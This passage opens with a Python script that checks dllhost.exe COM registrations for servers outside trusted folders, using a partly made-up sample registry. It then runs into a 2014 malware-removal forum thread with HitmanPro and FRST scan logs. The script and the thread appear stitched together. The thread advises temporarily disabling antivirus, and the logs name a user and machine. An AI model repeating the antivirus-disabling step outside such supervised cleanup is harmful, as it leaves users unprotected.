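# are the real registrations from the thread; the last two CLSIDs are made up.
SAMPLE_REG = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_176.ocx"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_176_ActiveX.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="c:\\Users\\mike\\AppData\\Roaming\\x\\loader.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]
@="Orphan class with no server"
"""

# Constructed dllhost command lines, as Win32_Process.CommandLine would report them.
SAMPLE_DLLHOST_CMDLINES = [
    r"C:\Windows\system32\DllHost.exe /Processid:{D27CDB6E-AE6D-11cf-96B8-444553540000}",
    r"C:\Windows\system32\DllHost.exe /Processid:{11111111-2222-3333-4444-555555555555}",
    r"C:\Windows\system32\DllHost.exe /Processid:{99999999-0000-0000-0000-000000000000}",
    r"C:\Windows\system32\DllHost.exe /Processid:{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}",
]


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {CLSID (upper-cased) -> {"name": ..., "server": ..., "subkey": ...}}."""
    clsids: Dict[str, Dict[str, str]] = {}
    current_clsid: Optional[str] = None
    current_sub: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            m = CLSID_RE.search(key.group("path"))
            current_clsid = m.group("clsid").upper() if m else None
            current_sub = m.group("sub") if m else None
            if current_clsid:
                clsids.setdefault(current_clsid, {})
            continue
        val = DEFAULT_VALUE_RE.match(line)
        if not (val and current_clsid):
            continue  # "@Denied", named values and non-CLSID keys are skipped
        # .reg files escape backslashes as "\\"; undo that for the path.
        value = val.group("val").replace("\\\\", "\\")
        if current_sub is None:
            clsids[current_clsid]["name"] = value
        elif current_sub in SERVER_SUBKEYS:
            clsids[current_clsid]["server"] = value
            clsids[current_clsid]["subkey"] = current_sub
    return clsids


def resolve_dllhost(cmdline: str, clsids: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Map one dllhost.exe command line to the COM server it hosts, with a verdict."""
    m = PROCESSID_RE.search(cmdline)
    if not m:
        return {"clsid": "", "name": "", "server": "", "verdict": "no /Processid argument"}
    clsid = m.group("clsid").upper()
    entry = clsids.get(clsid)
    if entry is None:
        return {"clsid": clsid, "name": "", "server": "", "verdict": "unregistered CLSID"}
    server = entry.get("server", "")
    if not server:
        verdict = "registered but no InprocServer32/LocalServer32 path"
    elif server.lower().startswith(TRUSTED_PREFIXES):
        verdict = "ok"
    else:
        verdict = "server outside trusted directories"
    return {"clsid": clsid, "name": entry.get("name", ""), "server": server, "verdict": verdict}


def triage(cmdlines: List[str], reg_text: str) -> List[Dict[str, str]]:
    """Resolve every dllhost command line against one registry export."""
    clsids = parse_reg_export(reg_text)
    return [resolve_dllhost(c, clsids) for c in cmdlines]


if __name__ == "__main__":
    for row in triage(SAMPLE_DLLHOST_CMDLINES, SAMPLE_REG):
        print(f"{row['clsid']}  {row['verdict']:48}  {row['server']}")
```

On a live Windows host you would feed it the output of `reg export HKCR\CLSID clsid.reg` (written as UTF-16, so open it with `encoding="utf-16"`) and the command lines from `Get-CimInstance Win32_Process -Filter "Name='dllhost.exe'" | Select-Object ProcessId, CommandLine`. Two caveats a practitioner should keep in mind: 32-bit registrations on 64-bit Windows live under Wow6432Node, as in the dump above, and the parser accepts either path; and HKCR merges HKCU\Software\Classes on top of HKLM\Software\Classes, so a CLSID registered only in the current user's hive wins for that user, which means an HKLM-only export can miss exactly the per-user registration you are looking for.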
 



#8 aharonov (Malware Response Team)

Posted 28 August 2014 - 05:05 PM
Looking better already. :)
How is your computer running now? What problems and symptoms are still present?


Step 1

Don't remove on your own anything that Hitman Pro detects!
This scanner, while it is really good for checking, has been known to delete files instead of curing them, which in some cases may render the machine unbootable.
Any removals will be done manually after careful analysis of the scan results!


Please download HitmanPro 32-bit / HitmanPro 64-bit by SurfRight and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
  • Right-click on the HitmanPro icon and select Run as Administrator to start the tool.
  • If the program won't run, please run it while holding down the left CTRL key until it's loaded!
  • Click on the Next button (1). You must agree with the terms of the EULA (2 - if asked).
  • Check the box beside "No, I only want to perform a one-time scan to check this computer" and click on the Next button. (3)
  • The program will start to scan the computer. It should only take several minutes.
  • When the scan is done, click on Save Log (4) and close HitmanPro! (5)
  • Copy and paste the content of the log file in your next reply.




Step 2

Start FRST with administrator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#9 LynnBR (Topic Starter)

Posted 28 August 2014 - 05:23 PM

Running much better, don't have to mess with resetting IE security settings now! No slowdowns so far, no dllhost explosion.

Hitman log (that got some attention here!)

 

HitmanPro 3.7.9.224
www.hitmanpro.com
   Computer name . . . . : E2013-3
   Windows . . . . . . . : 6.1.1.7601.X64/8
   User name . . . . . . : HACI\mike
   UAC . . . . . . . . . : Disabled
   License . . . . . . . : Free
   Scan date . . . . . . : 2014-08-28 15:12:47
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 4m 51s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
   Threats . . . . . . . : 0
   Traces  . . . . . . . : 204
   Objects scanned . . . : 2,284,528
   Files scanned . . . . : 28,941
   Remnants scanned  . . : 1,047,991 files / 1,207,596 keys
Suspicious files ____________________________________________________________
   C:\Users\mike\Desktop\FRST64.exe
      Size . . . . . . . : 2,103,296 bytes
      Age  . . . . . . . : 0.0 days (2014-08-28 14:18:34)
      Entropy  . . . . . : 7.5
      SHA-256  . . . . . : 820D53533899FA1DF19C7776368B3E242A5306E0DDDBC7ACAA58CA873B88AACA
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
   C:\Users\mike\Desktop\FSS.exe
      Size . . . . . . . : 415,232 bytes
      Age  . . . . . . . : 0.0 days (2014-08-28 14:16:42)
      Entropy  . . . . . : 7.9
      SHA-256  . . . . . : 149759CADFDF8C19A4104C7DB08BA490D33CFBD29785640385239087B79E1FD2
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
          0.0s C:\Users\mike\Desktop\FSS.exe
          0.0s C:\Users\mike\Desktop\FSS.exe
   C:\Windows\SysWOW64\hslide32.ocx
      Size . . . . . . . : 63,408 bytes
      Age  . . . . . . . : 503.0 days (2013-04-12 16:16:21)
      Entropy  . . . . . : 5.8
      SHA-256  . . . . . : 78196E0A70083136E388672802A9B6B16D43BE9EC59E0A3A9A67F1E8D962C09C
      Product  . . . . . : HSLIDE
      Publisher
      Description  . . . : Mabry HSlide Control
      Version  . . . . . : 1.10.008
      Copyright  . . . . : Copyright © 1994-1998 by Mabry Software, Inc.
      RSA Key Size . . . : 512
      LanguageID . . . . : 1033
      Authenticode . . . : Self-signed
      Fuzzy  . . . . . . : 27.0
         Program is code signed with a weak certificate. This is common to malware.
         Program is code self-signed.
         The file is located in a folder that contains core operating system files from Windows. This is not typical for most programs and is only common to system tools, drivers and hacking utilities.
         Authors name is missing in version info. This is not common to most programs.
   C:\Windows\SysWOW64\vslide32.ocx
      Size . . . . . . . : 62,896 bytes
      Age  . . . . . . . : 503.0 days (2013-04-12 16:16:21)
      Entropy  . . . . . : 5.7
      SHA-256  . . . . . : 3E9FBA353566BDBDD50D63E1614E665D065D4261AD90CA569A6EA3DE2282E501
      Product  . . . . . : VSLIDE
      Publisher
      Description  . . . : Mabry VSlide Control
      Version  . . . . . : 1.10.008
      Copyright  . . . . : Copyright © 1994-1998 by Mabry Software, Inc.
      RSA Key Size . . . : 512
      LanguageID . . . . : 1033
      Authenticode . . . : Self-signed
      Fuzzy  . . . . . . : 27.0
         Program is code signed with a weak certificate. This is common to malware.
         Program is code self-signed.
         The file is located in a folder that contains core operating system files from Windows. This is not typical for most programs and is only common to system tools, drivers and hacking utilities.
         Authors name is missing in version info. This is not common to most programs.

Cookies _____________________________________________________________________
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\07Y963DN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\0X47FEUC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1DE45WF9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1F4HN92U.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1JP13F7V.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1JQ4DHAH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1KQ0G9N4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1QVCFGJ8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1RCG0I6Y.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1RHY7PFE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1VGJOL6J.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\1Y8575FI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2030LIT1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\24GT313D.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\257HE9P6.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\28TDWLII.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2F14ZTX0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2PFKLEEJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\2RJTFR16.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3GHUINB8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3HS62TPR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3RBV1X3B.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3RJR3WAS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3SEKDGGA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\3Z8ZLBGW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\40TKDT4E.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\42K36HKW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\43ZGJ19B.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4AVFJS8A.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4BOKATW8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4EIHQYDU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4I8FPJGK.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4M3LRT4O.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4PRXRZI5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\4YJKY3BE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5IIKP8S7.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5JCKIY4X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5OHQ9XNA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\5RBH28TO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\606DQP10.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6GSOUKZR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6PQF2RTS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\6XQ9GB5G.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\70AMCY9G.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\783R2KE9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\78Q9GURW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\78UZ5MT1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7C9U08D4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7D5LI8G3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7I2IXN8J.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7QC1M5SA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\7SUBXQ6T.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\81MGGTHO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\82AU9ODZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\88MYNEY8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\88V46ED2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\8ATP7UC8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\8ZDM6L5F.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9AJXTH79.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9G1D6Q6O.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9J0WJ6NF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9MQI3W65.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9QBUE855.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9QSV316X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\9R7K41WD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\A1CXTFR9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\A526QFRM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AAJ9GA0D.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AON1KV5H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\APSU7Q8C.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AQJ0E322.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AUEQ2FWX.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\AVNDX4PS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BJPEJCX4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BTD11ZPV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\BXXSCY36.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\C4PRSUCR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\C7RPE3EQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\CV328LOW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\CZPUDKOM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D2ASCYMC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D5M00QSS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D72YROJ8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\D7SD01HM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DBD7JGSS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DDP6H6E1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DJHPXG40.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DQW1O8Z0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\DRE5185X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\E9H6SHOI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EFJZKKBA.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EJX6S9PC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ELGYSVCY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EN3511ZI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EU3B3658.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\EUGRF7MS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\F219U8Y2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\F6VFQOI9.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FAX3Z7WV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FEOJM082.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FLMPSGAJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FOO9RJIM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FQXPSDZL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FRMWEOJU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FWGNUQQ5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\FX9ZR4NT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\G2ST3N3P.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\G8M174SG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GKJH3LE0.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GM06FUT4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\GY8QCXYU.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\H4EO9QMO.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\HOFCGKFL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IFF2LMLH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ITOF30UD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IWLS4LB8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\IWMCK0LT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\J4U9BCSV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JA0DKY6H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JJ8WKF32.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JQLYDROV.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JR4F5H1H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JSYKZ9UJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\JY8H48KR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\K3377WNQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\K44LVU29.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\KXAPDO30.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\LDYCRJ63.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\LTIM8JO2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6CKM6S3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6DSYPGS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M6I5QWF3.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\M9YQABH1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MG3O2S1V.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MI04HOSN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MPC5LQAN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\MZIR8EH5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\N2EMVL30.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\N5Z6Z7XS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NATC0BVM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NDDS29PC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NTGWQN8P.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\NV7WPLHF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\OJ7FGABI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\OS74BHYB.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P4XU1DTF.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P686WL7Y.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P8TA4E72.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\P9FXJ1A6.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PBRQEXCT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PIKT1MUZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PRATSX95.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PW3E47GD.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\PZ22CWGN.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Q8I88SVW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QAJMKTHT.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QC1JXDMZ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QI8OHXTY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\QVLSRAQG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\R3GCXQ7L.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RCYRTWE5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RJBM0HQQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RNKG7LUE.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\RWGMIX69.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\SJIS8VNH.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ST1HPQIQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\T0M77QQI.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\T1RCQ1SP.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TTB26LHQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TVBJSI25.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\TWG0NYEQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\U2MTPEY5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UB7SS1Q1.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UJEI4MVW.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\UWQX407E.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\V39DLSZG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\VLGFQWYK.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W0F7YHT8.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W22B5Q3H.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W2E00QY4.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\W6NCUHZG.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WCHSGSF5.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WFKOMFTY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\WFY0DDHR.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\X1CBVMYP.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\X77UQM9W.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XEGIHKYJ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XJOWS15X.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XNVSI9SL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\XRYWQNDX.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Y5D1BQ94.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YACK9GT2.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YCTVD0QY.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YL58FUSQ.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YWK768WC.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\YX3RMCZS.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\Z1N87RWM.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZFRBCWVL.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZKAZ323T.txt
   C:\Users\mike\AppData\Roaming\Microsoft\Windows\Cookies\ZP4BZ3JL.txt

 

And FRST:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-08-2014
Ran by mike (administrator) on E2013-3 on 28-08-2014 15:20:15
Running from C:\Users\mike\Desktop
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe
(UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(SafeNet, Inc) C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe
